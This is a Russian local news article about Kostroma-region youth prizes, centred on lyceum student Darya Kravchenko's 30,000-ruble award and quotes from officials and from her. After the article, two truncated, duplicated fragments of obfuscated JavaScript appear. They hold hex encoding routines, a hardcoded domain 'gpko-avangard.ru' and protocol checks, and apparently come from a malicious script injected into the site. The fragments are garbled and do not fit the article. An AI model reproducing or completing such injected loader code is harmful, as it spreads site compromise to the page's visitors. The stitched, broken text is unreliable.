Знай наших!: Награды молодым и талантливым

Знай наших!: Награды молодым  и талантливым

Одиннадцатиклассница лицея № 1 Дарья Кравченко на состоявшейся в конце января в администрации региона церемонии награждения талантливой молодёжи отмечена государственной премией в размере 30 тысяч рублей. Дарья стала победителем в номинации «Социально значимая и общественная деятельность» как активистка ученического самоуправления, автор социально значимого проекта, постоянная участница молодёжных мероприятий. А всего лауреатами государственных и областных премий по итогам 2015 года стали 38 молодых костромичей.
В 2006 году Указом Президента России «О мерах государственной поддержки талантливой молодёжи» в Российской Федерации учреждены премии для поддержки активных молодых людей в возрасте от 14 до 25 лет. Костромская область — один из немногих регионов России, где этим премиям присвоены имена костромичей, прославивших область: А.Н. Лутошкина, И.А. Аркадьевой (актриса драмтеатра, на снимке — в центре), Ф.В. Чижова и А.В. Голубева. Их лауреатами и стали представители детских и молодёжных общественных объединений, учреждений образования Костромы, Буя, Галича, Мантурова, Костромского, Чухломского, Нерехтского муниципальных районов области.
— Самое большое богатство Костромской области — это люди, которые здесь живут. Вы, молодые, — главный потенциал нашего края. И я благодарю вас за ваши знания, мечты и стремления сделать нашу жизнь лучше. Искренне надеюсь, что жить и творить, реализовывать все свои идеи вы будете здесь, на территории нашего края, — отметил в своём выступлении заместитель губернатора Александр Соколов.
С заслуженными наградами ребят также поздравили руководители высших учебных заведений Костромы, депутаты областной Думы и заслуженные жители Костромской области.
Мы попросили Дарью Кравченко поделиться своими впечатлениями от такого значимого события в её судьбе. Сейчас девушка находится в Костроме, участвует в нескольких областных олимпиадах, и все же мы связались с ней по телефону. Вот что она сказала:
— Конечно, очень приятно, что нам, молодым, уделяется такое внимание, наша деятельность так высоко оценена. Радостно получить награду, которая стимулирует к дальнейшей работе, к осуществлению задуманного. Осталось очень хорошее впечатление от всего мероприятия, от общения с первыми лицами области. Интересно общаться с людьми искусства, со своими сверстниками, которые все очень талантливы и стремятся сделать жизнь лучше.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «gpko-avangard.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gpko-avangard.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e